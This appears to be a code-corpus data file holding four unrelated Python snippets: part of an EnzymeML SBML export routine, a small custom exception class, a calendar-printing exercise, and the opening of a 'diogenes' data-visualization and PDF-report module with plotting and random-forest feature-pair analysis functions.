species = educt[0]
stoich = educt[1]
const = educt[2]
init_concs = educt[-1]
specref = reaction.createReactant()
specref.setSpecies(species)
specref.setStoichiometry(stoich)
specref.setConstant(const)
# if there are different initial concentrations create an annotation
try:
# DIRTY WAY ATM TO MAINTAIN FUNCTIONALITY
init_concs.remove([])
except ValueError:
pass
if len(init_concs) > 0:
conc_annot = XMLNode( XMLTriple('enzymeml:initConcs'), XMLAttributes(), XMLNamespaces() )
conc_annot.addNamespace("http://sbml.org/enzymeml/version1", "enzymeml")
for conc in init_concs:
try:
conc_node = XMLNode( XMLTriple('enzymeml:initConc'), XMLAttributes(), XMLNamespaces() )
conc_node.addAttr( "id", str(conc) )
conc_node.addAttr( "value", str(enzmldoc.getConcDict()[conc][0]) )
conc_node.addAttr( "unit", enzmldoc.getReactant(species).getSubstanceunits() )
conc_annot.addChild( conc_node )
except KeyError:
inv_initconc = { item: key for key, item in enzmldoc.getConcDict().items() }
init_entry = enzmldoc.getConcDict()[
inv_initconc[ (conc, enzmldoc.getReactant(species).getSubstanceunits() ) ]
]
conc_node = XMLNode( XMLTriple('enzymeml:initConc'), XMLAttributes(), XMLNamespaces() )
conc_node.addAttr( "id", inv_initconc[ (conc, enzmldoc.getReactant(species).getSubstanceunits() ) ] )
conc_node.addAttr( "value", str(init_entry[0]) )
conc_node.addAttr( "unit", str(init_entry[1]) )
conc_annot.addChild( conc_node )
specref.appendAnnotation(conc_annot)
for repl in educt[3]:
repl_node = XMLNode( XMLTriple('enzymeml:replica'), XMLAttributes(), XMLNamespaces() )
repl_node.addAttr('measurement', 'M0')
repl_node.addAttr('replica', repl.getReplica())
form_node = XMLNode( XMLTriple('enzymeml:column'), XMLAttributes(), XMLNamespaces() )
form_node.addAttr( 'replica', repl.getReplica() )
form_node.addAttr( 'species', repl.getReactant() )
form_node.addAttr( 'type', repl.getType() )
form_node.addAttr( 'unit', repl.getDataUnit() )
form_node.addAttr( 'index', str(index) )
form_node.addAttr( 'initConcID', str(repl.getInitConc()) )
replica_root.addChild(repl_node)
format_.addChild(form_node)
data.append( repl.getData().values.tolist() )
index += 1
# products
for product in reac.getProducts():
species = product[0]
stoich = product[1]
const = product[2]
specref = reaction.createProduct()
specref.setSpecies(species)
specref.setStoichiometry(stoich)
specref.setConstant(const)
for repl in product[3]:
repl_node = XMLNode( XMLTriple('enzymeml:replica'), XMLAttributes(), XMLNamespaces() )
repl_node.addAttr('measurement', 'M0')
repl_node.addAttr('replica', repl.getReplica())
form_node = XMLNode( XMLTriple('enzymeml:column'), XMLAttributes(), XMLNamespaces() )
form_node.addAttr( 'replica', repl.getReplica() )
form_node.addAttr( 'species', repl.getReactant() )
form_node.addAttr( 'type', repl.getType() )
form_node.addAttr( 'unit', repl.getDataUnit() )
form_node.addAttr( 'index', str(index) )
form_node.addAttr( 'initConcID', str(repl.getInitConc()) )
replica_root.addChild(repl_node)
format_.addChild(form_node)
data.append( repl.getData().values.tolist() )
index += 1
# modifiers
for modifier in reac.getModifiers():
species = modifier[0]
specref = reaction.createModifier()
specref.setSpecies(species)
for repl in modifier[-1]:
repl_node = XMLNode( XMLTriple('enzymeml:replica'), XMLAttributes(), XMLNamespaces() )
repl_node.addAttr('measurement', 'M0')
repl_node.addAttr('replica', repl.getReplica())
form_node = XMLNode( XMLTriple('enzymeml:column'), XMLAttributes(), XMLNamespaces() )
form_node.addAttr( 'replica', repl.getReplica() )
form_node.addAttr( 'species', repl.getReactant() )
form_node.addAttr( 'initConcID', str(repl.getInitConc()) )
replica_root.addChild(repl_node)
format_.addChild(form_node)
data.append( repl.getData().values.tolist() )
index += 1
try:
# add kinetic law if existent
reac.getModel().addToReaction(reaction)
except AttributeError:
pass
if len( all_repls ) > 0:
annot_root.addChild( replica_root )
reaction.appendAnnotation(annot_root)
# finalize all reactions
list_formats.addChild(format_)
list_measurements = XMLNode( XMLTriple('enzymeml:listOfMeasurements'), XMLAttributes(), XMLNamespaces() )
meas = XMLNode( XMLTriple('enzymeml:measurement'), XMLAttributes(), XMLNamespaces() )
meas.addAttr('file', 'file0')
meas.addAttr('id', 'M0')
meas.addAttr('name', 'AnyName')
list_measurements.addChild(meas)
if len( all_repls ) > 0:
list_files = XMLNode( XMLTriple('enzymeml:listOfFiles'), XMLAttributes(), XMLNamespaces() )
file = XMLNode( XMLTriple( 'enzymeml:file' ), XMLAttributes(), XMLNamespaces() )
file.addAttr('file', './data/data.csv')
file.addAttr('format', 'format0')
file.addAttr('id', 'file0')
list_files.addChild(file)
if csv:
# write file to csv
df = pd.DataFrame( np.array(data).T )
df.to_csv( self.path + '/data/data.csv', index=False, header=False)
if len( all_repls ) > 0:
data_root.addChild(list_formats)
data_root.addChild(list_files)
data_root.addChild(list_measurements)
model.getListOfReactions().appendAnnotation(data_root) | StarcoderdataPython |
9715416 | from typing import Union
class NoTokenException(Exception):
    """Raised when an expected token is missing.

    Parameters
    ----------
    value : Union[str, int]
        Identifier or message describing the missing token; it is echoed
        back by ``str(exc)`` and stored on the ``value`` attribute.
    """

    def __init__(self, value: Union[str, int]) -> None:
        # Pass the value through to Exception so exc.args is populated —
        # the original called super().__init__() with no arguments, which
        # left args empty and made repr()/pickling uninformative.
        super().__init__(value)
        self.value = value

    def __str__(self) -> str:
        # Always render as a string, even for int values.
        return str(self.value)
| StarcoderdataPython |
5168581 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# SPDX-Short-Identifier: MIT
# (c) 2019 <NAME>
# This code is licensed under MIT license (See LICENSE.txt for details)
__author__ = "<NAME>"
__copyright__ = "Copyright 2019, <NAME>"
__credits__ = ["<NAME>"]
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"
# Weekday column labels; note "S" appears twice (Sunday and Saturday), so
# .index("S") always resolves to Sunday (index 0).
start_day_index_ref = ["S", "M", "T", "W", "Th", "F", "S"]


def print_calendar_week(start_day: str = "S", start_month_date: int = 1,
                        last_date=None) -> None:
    """Print one week row of dates (no trailing newline).

    Parameters
    ----------
    start_day : str
        Weekday column the first date falls under ("S", "M", ... as in
        the header printed by print_calendar_month).
    start_month_date : int
        Date printed in the start_day column.
    last_date : int or None
        Optional last valid date of the month; dates past it are not
        printed. None keeps the historical behaviour of always printing
        through the end of the week.
    """
    start_day_index = start_day_index_ref.index(start_day)
    # Each date is rendered in a 3-character column ("{:>3}"), so the
    # leading offset must be 3 spaces per skipped weekday. (The original
    # printed only 1 space per skipped day, misaligning every
    # non-Sunday start.)
    print("   " * start_day_index, end="")
    end = start_month_date + 7 - start_day_index
    if last_date is not None:
        end = min(end, last_date + 1)
    for date in range(start_month_date, end):
        print("{:>3}".format(date), end="")


def print_calendar_month(start_day: str = "S", day_count: int = 1) -> None:
    """Print a calendar month of ``day_count`` days starting on ``start_day``."""
    # Header columns are 3 characters wide to line up with the "{:>3}" dates.
    print("  S  M  T  W Th  F  S")
    start_day_index = start_day_index_ref.index(start_day)
    date = 1
    while date <= day_count:
        # Only the first row is offset; every later row starts on Sunday.
        print_calendar_week(start_day if date == 1 else "S", date, day_count)
        print()
        # The first row holds (7 - offset) dates; later rows hold 7.
        # (The original stepped by a fixed 7, which skipped dates
        # whenever the month did not start on Sunday.)
        date += 7 - (start_day_index if date == 1 else 0)
# This is a compatibility layer to make this code "Coursemology friendly".
# It simply takes Coursemology's input and passed it to the main function
# ...in a format the the program understands
def print_calendar(days, day_of_week):
    """Coursemology adapter: forward (days, day_of_week) to the real
    implementation in the argument order it expects."""
    print_calendar_month(start_day=day_of_week, day_count=days)


print_calendar(days, day_of_week)
9734530 | """Tools to visualize data and display results"""
import os
import shutil
import StringIO
import cgi
import uuid
import abc
from datetime import datetime
from collections import Counter
import itertools as it
import numpy as np
from diogenes import utils
import matplotlib
if utils.on_headless_server():
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.dates
from matplotlib.pylab import boxplot
from sklearn.grid_search import GridSearchCV
from sklearn.neighbors.kde import KernelDensity
from sklearn.metrics import roc_curve, roc_auc_score, precision_recall_curve
from sklearn.tree._tree import TREE_LEAF
from sklearn.base import BaseEstimator
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
import pdfkit
from diogenes.grid_search import Experiment
from diogenes.utils import is_sa, is_nd, cast_np_sa_to_nd, convert_to_sa, cast_list_of_list_to_sa
if hasattr(plt, 'style'):
# Make our plots pretty if matplotlib is new enough
plt.style.use('ggplot')
def pprint_sa(M, row_labels=None, col_labels=None):
    """Prints a nicely formatted Structured array (or similar object) to console
    Parameters
    ----------
    M : numpy.ndarray or list of lists
        structured array or homogeneous array or list of lists to print
    row_labels : list or None
        labels to put in front of rows. Defaults to row number
    col_labels : list of str or None
        names to label columns with. If M is a structured array, its column
        names will be used instead
    """
    # If M is not already a structured array, check_sa converts it, baking
    # col_labels into the dtype; either way the dtype names win below.
    M = utils.check_sa(M, col_names_if_converted=col_labels)
    if row_labels is None:
        row_labels = xrange(M.shape[0])
    # The dtype's names always override the col_labels argument here
    # (this is the documented behavior for structured arrays).
    col_labels = M.dtype.names
    # From http://stackoverflow.com/questions/9535954/python-printing-lists-as-tabular-data
    # Column width = widest formatted cell in it, but at least the header width.
    col_lens = [max(max([len('{}'.format(cell)) for cell in M[name]]),
                    len(name)) for name in col_labels]
    row_label_len = max([len('{}'.format(label)) for label in row_labels])
    # One right-aligning format template reused for the header and every row.
    row_format = ('{{:>{}}} '.format(row_label_len) +
                  ' '.join(['{{:>{}}}'.format(col_len) for col_len
                            in col_lens]))
    print row_format.format("", *col_labels)
    for row_name, row in zip(row_labels, M):
        print row_format.format(row_name, *row)
# (metric label, aggregation function) pairs applied to every numeric
# column by describe_cols below.
__describe_cols_metrics = [('Count', len),
                           ('Mean', np.mean),
                           ('Standard Dev', np.std),
                           ('Minimum', min),
                           ('Maximum', max)]
# Placeholder row used for non-numeric columns: one NaN per metric above.
__describe_cols_fill = [np.nan] * len(__describe_cols_metrics)
def describe_cols(M, verbose=True):
    """Return per-column summary statistics for a structured array.

    Numeric columns (integer/float dtypes) get Count, Mean, Standard Dev,
    Minimum and Maximum; every other column is filled with NaN.

    Parameters
    ----------
    M : numpy.ndarray
        structured array
    verbose : bool
        iff True, pretty-print the resulting table to the console

    Returns
    -------
    numpy.ndarray
        structured array of summary statistics for M
    """
    M = utils.check_sa(M)
    summary_rows = []
    for name, dtype_str in M.dtype.descr:
        # 'i'/'f' in the dtype string mark integer/float columns.
        numeric = 'f' in dtype_str or 'i' in dtype_str
        if numeric:
            values = M[name]
            stats = [metric(values) for _, metric in __describe_cols_metrics]
        else:
            stats = list(__describe_cols_fill)
        summary_rows.append([name] + stats)
    header = ['Column Name'] + [label for label, _ in
                                __describe_cols_metrics]
    result = convert_to_sa(summary_rows, col_names=header)
    if verbose:
        pprint_sa(result)
    return result
def table(col, verbose=True):
    """Count the occurrences of each distinct value in ``col``.

    Similar to R's ``table``.

    Parameters
    ----------
    col : np.ndarray

    Returns
    -------
    np.ndarray
        structured array with 'col_name' and 'count' columns, ordered by
        value
    """
    col = utils.check_col(col)
    counts = Counter(col)
    value_count_pairs = sorted(counts.iteritems(), key=lambda pair: pair[0])
    result = convert_to_sa(value_count_pairs, col_names=('col_name', 'count'))
    if verbose:
        pprint_sa(result)
    return result
def crosstab(col1, col2, verbose=True):
    """
    Makes a crosstab of col1 and col2. This is represented as a
    structured array with the following properties:
    1. The first column is the value of col1 being crossed
    2. The name of every column except the first is the value of col2 being
       crossed
    3. To find the number of cooccurences of x from col1 and y in col2,
       find the row that has 'x' in col1 and the column named 'y'. The
       corresponding cell is the number of cooccurrences of x and y
    Parameters
    ----------
    col1 : np.ndarray
    col2 : np.ndarray
    Returns
    -------
    np.ndarray
        structured array
    """
    col1 = utils.check_col(col1, argument_name='col1')
    col2 = utils.check_col(col2, argument_name='col2')
    col1_unique = np.unique(col1)
    col2_unique = np.unique(col2)
    crosstab_rows = []
    for col1_val in col1_unique:
        # Rows of col2 that co-occur with this col1 value
        loc_col1_val = np.where(col1 == col1_val)[0]
        cnt = Counter(col2[loc_col1_val])
        # Counter returns 0 for absent keys, so no membership test is
        # needed (the previous dict.has_key call was Python-2-only and
        # redundant).
        counts = [cnt[col2_val] for col2_val in col2_unique]
        crosstab_rows.append(['{}'.format(col1_val)] + counts)
    col_names = ['col1_value'] + ['{}'.format(col2_val) for col2_val in
                                  col2_unique]
    ret = convert_to_sa(crosstab_rows, col_names=col_names)
    if verbose:
        pprint_sa(ret)
    return ret
def plot_simple_histogram(col, verbose=True):
    """Plot a histogram of the values in ``col``.

    String/object columns are bar-charted with one bar per category;
    numeric columns are binned into 50 histogram bins.

    Parameters
    ----------
    col : np.ndarray
    verbose : boolean
        iff True, display the graph

    Returns
    -------
    matplotlib.figure.Figure
        Figure containing plot
    """
    col = utils.check_col(col)
    is_categorical = col.dtype.char in ('O', 'S')
    if is_categorical:
        # One bar per distinct string, labeled below the axis.
        tallies = Counter(col)
        categories = sorted(tallies.keys())
        hist = [tallies[category] for category in categories]
        bins = np.arange(len(categories) + 1)
    else:
        hist, bins = np.histogram(col, bins=50)
    bar_width = 0.7 * (bins[1] - bins[0])
    centers = (bins[:-1] + bins[1:]) / 2
    fig = plt.figure()
    plt.bar(centers, hist, align='center', width=bar_width)
    if is_categorical:
        plt.xticks(centers, categories)
    if verbose:
        plt.show()
    return fig
# all of the below take output from any func in grid_search or operate
def plot_prec_recall(labels, score, title='Prec/Recall', verbose=True):
    """Plot precision/recall curve
    Parameters
    ----------
    labels : np.ndarray
        vector of ground truth
    score : np.ndarray
        vector of scores assigned by classifier (i.e.
        clf.pred_proba(...)[-1] in sklearn)
    title : str
        title of plot
    verbose : boolean
        iff True, display the graph
    Returns
    -------
    matplotlib.figure.Figure
        Figure containing plot
    """
    labels = utils.check_col(labels, argument_name='labels')
    score = utils.check_col(score, argument_name='score')
    # adapted from Rayid's prec/recall code
    y_true = labels
    y_score = score
    precision_curve, recall_curve, pr_thresholds = precision_recall_curve(
        y_true,
        y_score)
    # sklearn appends a final (precision=1, recall=0) point with no
    # associated threshold; drop it so both curves line up with
    # pr_thresholds.
    precision_curve = precision_curve[:-1]
    recall_curve = recall_curve[:-1]
    # x axis: fraction of the population scored at or above each threshold.
    pct_above_per_thresh = []
    number_scored = len(y_score)
    for value in pr_thresholds:
        num_above_thresh = len(y_score[y_score>=value])
        pct_above_thresh = num_above_thresh / float(number_scored)
        pct_above_per_thresh.append(pct_above_thresh)
    pct_above_per_thresh = np.array(pct_above_per_thresh)
    # Two y axes sharing the population x axis: precision in blue on the
    # left, recall in red on the right.
    fig = plt.figure()
    ax1 = plt.gca()
    ax1.plot(pct_above_per_thresh, precision_curve, 'b')
    ax1.set_xlabel('percent of population')
    ax1.set_ylabel('precision', color='b')
    ax2 = ax1.twinx()
    ax2.plot(pct_above_per_thresh, recall_curve, 'r')
    ax2.set_ylabel('recall', color='r')
    plt.title(title)
    if verbose:
        fig.show()
    return fig
def plot_roc(labels, score, title='ROC', verbose=True):
    """Plot an ROC curve against the share of the population scored.

    Parameters
    ----------
    labels : np.ndarray
        vector of ground truth
    score : np.ndarray
        vector of scores assigned by classifier (i.e.
        clf.pred_proba(...)[-1] in sklearn)
    title : str
        title of plot
    verbose : boolean
        iff True, display the graph

    Returns
    -------
    matplotlib.figure.Figure
        Figure containing plot
    """
    labels = utils.check_col(labels, argument_name='labels')
    score = utils.check_col(score, argument_name='score')
    # adapted from Rayid's prec/recall code
    fpr, tpr, thresholds = roc_curve(labels, score)
    # x axis: fraction of the population scored at or above each threshold.
    number_scored = len(score)
    pct_above_per_thresh = np.array(
        [len(score[score >= thresh]) / float(number_scored)
         for thresh in thresholds])
    # Two y axes sharing the population x axis: fpr in blue on the left,
    # tpr in red on the right.
    fig = plt.figure()
    ax_fpr = plt.gca()
    ax_fpr.plot(pct_above_per_thresh, fpr, 'b')
    ax_fpr.set_xlabel('percent of population')
    ax_fpr.set_ylabel('fpr', color='b')
    ax_tpr = ax_fpr.twinx()
    ax_tpr.plot(pct_above_per_thresh, tpr, 'r')
    ax_tpr.set_ylabel('tpr', color='r')
    plt.title(title)
    if verbose:
        fig.show()
    return fig
def plot_box_plot(col, title=None, verbose=True):
    """Draw a box plot for a single feature column.

    Parameters
    ----------
    col : np.array
    title : str or None
        title of the plot; omitted when falsy
    verbose : boolean
        iff True, display the graph

    Returns
    -------
    matplotlib.figure.Figure
        Figure containing plot
    """
    col = utils.check_col(col)
    fig = plt.figure()
    boxplot(col)
    if title:
        plt.title(title)
    # TODO add col_name to graph
    if verbose:
        plt.show()
    return fig
def get_top_features(clf, M=None, col_names=None, n=10, verbose=True):
    """Gets the top features for a fitted clf
    Parameters
    ----------
    clf : sklearn.base.BaseEstimator
        Fitted classifier with a feature_importances_ attribute
    M : numpy.ndarray or None
        Structured array corresponding to fitted clf. Used here to determine
        column names
    col_names : list of str or None
        List of column names corresponding to fitted clf.
    n : int
        Number of features to return
    verbose : boolean
        iff True, prints ranked features
    Returns
    -------
    numpy.ndarray
        structured array with top feature names and scores
    """
    if not isinstance(clf, BaseEstimator):
        raise ValueError('clf must be an instance of sklearn.Base.BaseEstimator')
    scores = clf.feature_importances_
    # Resolve feature names: explicit col_names wins; otherwise use M's
    # dtype names; otherwise synthesize f0, f1, ...
    if col_names is None:
        if is_sa(M):
            col_names = M.dtype.names
        else:
            col_names = ['f{}'.format(i) for i in xrange(len(scores))]
    else:
        col_names = utils.check_col_names(col_names, n_cols = scores.shape[0])
    # argsort()[::-1] ranks feature indices from highest to lowest importance.
    ranked_name_and_score = [(col_names[x], scores[x]) for x in
                             scores.argsort()[::-1]]
    ranked_name_and_score = convert_to_sa(
        ranked_name_and_score[:n],
        col_names=('feat_name', 'score'))
    if verbose:
        pprint_sa(ranked_name_and_score)
    return ranked_name_and_score
# TODO features form top % of clfs
def get_roc_auc(labels, score, verbose=True):
    """return area under ROC curve
    Parameters
    ----------
    labels : np.ndarray
        vector of ground truth
    score : np.ndarray
        vector of scores assigned by classifier (i.e.
        clf.pred_proba(...)[-1] in sklearn)
    verbose : boolean
        iff True, prints area under the curve
    Returns
    -------
    float
        area under the curve
    """
    labels = utils.check_col(labels, argument_name='labels')
    score = utils.check_col(score, argument_name='score')
    # The actual computation is delegated to sklearn.
    auc_score = roc_auc_score(labels, score)
    if verbose:
        print 'ROC AUC: {}'.format(auc_score)
    return auc_score
def plot_correlation_matrix(M, verbose=True):
    """Plot correlation between variables in M
    Parameters
    ----------
    M : numpy.ndarray
        structured array
    verbose : boolean
        iff True, display the graph
    Returns
    -------
    matplotlib.figure.Figure
        Figure containing plot
    """
    # http://glowingpython.blogspot.com/2012/10/visualizing-correlation-matrices.html
    # TODO work on structured arrays or not
    # TODO ticks are col names
    M = utils.check_sa(M)
    # (Removed a dead `names = M.dtype.names` local; the names are not
    # used until the TODO above is addressed.)
    M = cast_np_sa_to_nd(M)
    # rowvar=0: rows are items, columns are features/variables.
    cc = np.corrcoef(M, rowvar=0)
    fig = plt.figure()
    plt.pcolor(cc)
    plt.colorbar()
    # Tick labels are column indices, centered on each cell.
    plt.yticks(np.arange(0.5, M.shape[1] + 0.5), range(0, M.shape[1]))
    plt.xticks(np.arange(0.5, M.shape[1] + 0.5), range(0, M.shape[1]))
    if verbose:
        plt.show()
    return fig
def plot_correlation_scatter_plot(M, verbose=True):
    """Makes a grid of scatter plots representing relationship between variables
    Each scatter plot is one variable plotted against another variable
    Parameters
    ----------
    M : numpy.ndarray
        structured array
    verbose : boolean
        iff True, display the graph
    Returns
    -------
    matplotlib.figure.Figure
        Figure containing plot
    """
    # TODO work for all three types that M might be
    # TODO ignore classification variables
    # adapted from the excellent
    # http://stackoverflow.com/questions/7941207/is-there-a-function-to-make-scatterplot-matrices-in-matplotlib
    M = utils.check_sa(M)
    # NOTE(review): numdata is never used below.
    numdata = M.shape[0]
    numvars = len(M.dtype)
    names = M.dtype.names
    # One subplot per ordered pair of variables; diagonal holds the labels.
    fig, axes = plt.subplots(numvars, numvars)
    fig.subplots_adjust(hspace=0.05, wspace=0.05)
    for ax in axes.flat:
        # Hide all ticks and labels
        ax.xaxis.set_visible(False)
        ax.yaxis.set_visible(False)
        # Set up ticks only on one side for the "edge" subplots...
        if ax.is_first_col():
            ax.yaxis.set_ticks_position('left')
        if ax.is_last_col():
            ax.yaxis.set_ticks_position('right')
        if ax.is_first_row():
            ax.xaxis.set_ticks_position('top')
        if ax.is_last_row():
            ax.xaxis.set_ticks_position('bottom')
    # Plot the M.
    # Each upper-triangle index pair (i, j) fills both the (i, j) and
    # (j, i) panels with mirrored scatter plots.
    for i, j in zip(*np.triu_indices_from(axes, k=1)):
        for x, y in [(i,j), (j,i)]:
            axes[x,y].plot(M[M.dtype.names[x]], M[M.dtype.names[y]], '.')
    # Label the diagonal subplots...
    for i, label in enumerate(names):
        axes[i,i].annotate(label, (0.5, 0.5), xycoords='axes fraction',
                           ha='center', va='center')
    # Turn on the proper x or y axes ticks.
    # it.cycle((-1, 0)) alternates between the last and first row/column,
    # so visible ticks alternate between opposite edges of the grid.
    for i, j in zip(range(numvars), it.cycle((-1, 0))):
        axes[j,i].xaxis.set_visible(True)
        axes[i,j].yaxis.set_visible(True)
    if verbose:
        plt.show()
    return fig
def plot_kernel_density(col, verbose=True):
    """Plots kernel density function of column
    From:
    https://jakevdp.github.io/blog/2013/12/01/kernel-density-estimation/
    Parameters
    ----------
    col : np.ndarray
    verbose : boolean
        iff True, display the graph
    Returns
    -------
    matplotlib.figure.Figure
        Figure containing plot
    """
    #address pass entire matrix
    # TODO respect missing_val
    # TODO what does n do?
    col = utils.check_col(col)
    # Evaluate the fitted density on a 1000-point grid spanning the data.
    x_grid = np.linspace(min(col), max(col), 1000)
    # Choose the KDE bandwidth by cross-validated grid search over 30
    # candidates in [0.1, 1.0].
    grid = GridSearchCV(KernelDensity(), {'bandwidth': np.linspace(0.1,1.0,30)}, cv=20) # 20-fold cross-validation
    grid.fit(col[:, None])
    kde = grid.best_estimator_
    # score_samples returns the log-density; exponentiate to get the pdf.
    pdf = np.exp(kde.score_samples(x_grid[:, None]))
    fig, ax = plt.subplots()
    #fig = plt.figure()
    ax.plot(x_grid, pdf, linewidth=3, alpha=0.5, label='bw=%.2f' % kde.bandwidth)
    # Overlay a normalized histogram of the raw data for comparison.
    # NOTE(review): `normed` was removed in newer matplotlib; switch to
    # `density=True` if the matplotlib pin ever moves.
    ax.hist(col, 30, fc='gray', histtype='stepfilled', alpha=0.3, normed=True)
    ax.legend(loc='upper left')
    ax.set_xlim(min(col), max(col))
    if verbose:
        plt.show()
    return fig
def plot_on_timeline(col, verbose=True):
    """Plot each value of a date column as a point on a timeline.

    Parameters
    ----------
    col : np.array
    verbose : boolean
        iff True, display the graph

    Returns
    -------
    matplotlib.figure.Figure
        Figure containing plot
    """
    col = utils.check_col(col)
    # http://stackoverflow.com/questions/1574088/plotting-time-in-python-with-matplotlib
    # numpy datetime columns must become Python datetimes before date2num.
    if is_nd(col):
        col = col.astype(datetime)
    date_nums = matplotlib.dates.date2num(col)
    fig = plt.figure()
    # All points share y=0 so they read as a single horizontal timeline.
    plt.plot_date(date_nums, [0] * len(date_nums))
    if verbose:
        plt.show()
    return fig
def _feature_pair_report(pair_and_values,
                         description='pairs',
                         measurement='value',
                         note=None,
                         n=10):
    # Console helper: print the first n (pair, value) entries of
    # pair_and_values under a banner. Callers pass the iterable already
    # sorted in the order they want displayed.
    print '-' * 80
    print description
    print '-' * 80
    print 'feature pair : {}'.format(measurement)
    for pair, value in it.islice(pair_and_values, n):
        print '{} : {}'.format(pair, value)
    if note is not None:
        print '* {}'.format(note)
    print
def feature_pairs_in_tree(dt):
    """Collect parent/child feature pairs of a decision tree, per depth.

    Parameters
    ----------
    dt : sklearn.tree.DecisionTreeClassifer

    Returns
    -------
    list of list of tuple of int :
        Going from inside to out:
        1. Each int is a feature that a node split on
        2. If two ints appear in the same tuple, then there was a node
           that split on the second feature immediately below a node
           that split on the first feature
        3. Tuples appearing in the same inner list appear at the same
           depth in the tree
        4. The outer list describes the entire tree
    """
    if not isinstance(dt, DecisionTreeClassifier):
        raise ValueError('dt must be an sklearn.tree.DecisionTreeClassifier')
    tree = dt.tree_
    feature = tree.feature
    left = tree.children_left
    right = tree.children_right
    # A root that is itself a leaf yields no pairs at all.
    if left[0] == TREE_LEAF:
        return []
    pairs_per_depth = []
    frontier = [0]
    while frontier:
        next_frontier = []
        pairs_here = []
        # reversed() reproduces the original pop-from-the-end ordering.
        for node in reversed(frontier):
            for child in (left[node], right[node]):
                # Only splitting children contribute a (parent, child)
                # feature pair; pairs are sorted so order is canonical.
                if left[child] != TREE_LEAF:
                    pairs_here.append(tuple(sorted((feature[node],
                                                    feature[child]))))
                    next_frontier.append(child)
        pairs_per_depth.append(pairs_here)
        frontier = next_frontier
    # The deepest level can never produce pairs; drop its empty list.
    pairs_per_depth.pop()
    return pairs_per_depth
def feature_pairs_in_rf(rf, weight_by_depth=None, verbose=True, n=10):
    """Describes the frequency of features appearing subsequently in each tree
    in a random forest
    Parameters
    ----------
    rf : sklearn.ensemble.RandomForestClassifier
        Fitted random forest
    weight_by_depth : iterable or None
        Weights to give to each depth in the "occurences weighted by depth
        metric"
        weight_by_depth is a vector. The 0th entry is the weight of being at
        depth 0; the 1st entry is the weight of being at depth 1, etc.
        If not provided, wdiogenes are linear with negative depth. If
        the provided vector is not as long as the number of depths, then
        remaining depths are weighted with 0
    verbose : boolean
        iff True, prints metrics to console
    n : int
        Prints the top-n-scoring feature pairs to console if verbose==True
    Returns
    -------
    (collections.Counter, list of collections.Counter, dict, dict)
        A tuple with a number of metrics
        1. A Counter of cooccuring feature pairs at all depths
        2. A list of Counters of feature pairs. Element 0 corresponds to
           depth 0, element 1 corresponds to depth 1 etc.
        3. A dict where keys are feature pairs and values are the average
           depth of those feature pairs
        4. A dict where keys are feature pairs and values are the number
           of occurences of those feature pairs weighted by depth
    """
    if not isinstance(rf, RandomForestClassifier):
        raise ValueError(
            'rf must be an sklearn.Ensemble.RandomForestClassifier')
    # Per-tree pair lists, then regrouped so element d collects the pairs
    # every tree produced at depth d (shorter trees padded with []).
    pairs_by_est = [feature_pairs_in_tree(est) for est in rf.estimators_]
    pairs_by_depth = [list(it.chain(*pair_list)) for pair_list in
                      list(it.izip_longest(*pairs_by_est, fillvalue=[]))]
    pairs_flat = list(it.chain(*pairs_by_depth))
    # pair -> list of every depth at which that pair occurred
    depths_by_pair = {}
    for depth, pairs in enumerate(pairs_by_depth):
        for pair in pairs:
            try:
                depths_by_pair[pair] += [depth]
            except KeyError:
                depths_by_pair[pair] = [depth]
    counts_by_pair=Counter(pairs_flat)
    count_pairs_by_depth = [Counter(pairs) for pairs in pairs_by_depth]
    depth_len = len(pairs_by_depth)
    if weight_by_depth is None:
        # Default weights decrease linearly from 1.0 at the root to
        # 1/depth_len at the deepest level.
        weight_by_depth = [(depth_len - float(depth)) / depth_len for depth in
                           xrange(depth_len)]
    # Pad user-supplied weights with zeros for any unweighted deeper levels.
    weight_filler = it.repeat(0.0, depth_len - len(weight_by_depth))
    wdiogenes = list(it.chain(weight_by_depth, weight_filler))
    average_depth_by_pair = {pair: float(sum(depths)) / len(depths) for
                             pair, depths in depths_by_pair.iteritems()}
    weighted = {pair: sum([wdiogenes[depth] for depth in depths])
                for pair, depths in depths_by_pair.iteritems()}
    if verbose:
        print '=' * 80
        print 'RF Subsequent Pair Analysis'
        print '=' * 80
        print
        _feature_pair_report(
            counts_by_pair.most_common(),
            'Overall Occurrences',
            'occurrences',
            n=n)
        _feature_pair_report(
            sorted([item for item in average_depth_by_pair.iteritems()],
                   key=lambda item: item[1]),
            'Average depth',
            'average depth',
            'Max depth was {}'.format(depth_len - 1),
            n=n)
        _feature_pair_report(
            sorted([item for item in weighted.iteritems()],
                   key=lambda item: item[1]),
            'Occurrences weighted by depth',
            'sum weight',
            'Wdiogenes for depth 0, 1, 2, ... were: {}'.format(wdiogenes),
            n=n)
        for depth, pairs in enumerate(count_pairs_by_depth):
            _feature_pair_report(
                pairs.most_common(),
                'Occurrences at depth {}'.format(depth),
                'occurrences',
                n=n)
    return (counts_by_pair, count_pairs_by_depth, average_depth_by_pair,
            weighted)
class ReportError(Exception):
    """Error generated by Report (e.g. an Experiment-dependent method was
    called on a Report constructed without an Experiment)"""
    pass
class Report(object):
    """Creates pdf reports.
    Reports can either be associated with a particular
    diogenes.grid_search.experiment.Experiment or it can simply be used as
    a way to concatenate figures, text, and tables
    Parameters
    ----------
    exp : diogenes.grid_search.experiment.Experiment or None
        Experiment used to make figures. Optional.
    report_path : path of the generated pdf
    """
    def __init__(self, exp=None, report_path='report.pdf'):
        self.__exp = exp
        # Maps each Trial object back to its index in exp.trials so summary
        # graphs and legends can refer to trials by number.
        if exp is not None:
            self.__back_indices = {trial: i for i, trial in enumerate(exp.trials)}
        # Accumulated HTML snippets, concatenated in order by to_pdf.
        self.__objects = []
        self.__tmp_folder = 'diogenes_temp'
        if not os.path.exists(self.__tmp_folder):
            os.mkdir(self.__tmp_folder)
        # Unique scratch file so concurrent Reports don't clobber each other.
        self.__html_src_path = os.path.join(self.__tmp_folder,
                                            '{}.html'.format(uuid.uuid4()))
        self.__report_path = report_path
    def __html_escape(self, s):
        """Returns a string with all its html-averse characters html escaped"""
        return cgi.escape(s).encode('ascii', 'xmlcharrefreplace')
    def __html_format(self, fmt, *args, **kwargs):
        # Like fmt.format(...) but html-escapes every argument first; the
        # format template itself is trusted.
        clean_args = [self.__html_escape(str(arg)) for arg in args]
        clean_kwargs = {key: self.__html_escape(str(kwargs[key])) for
                        key in kwargs}
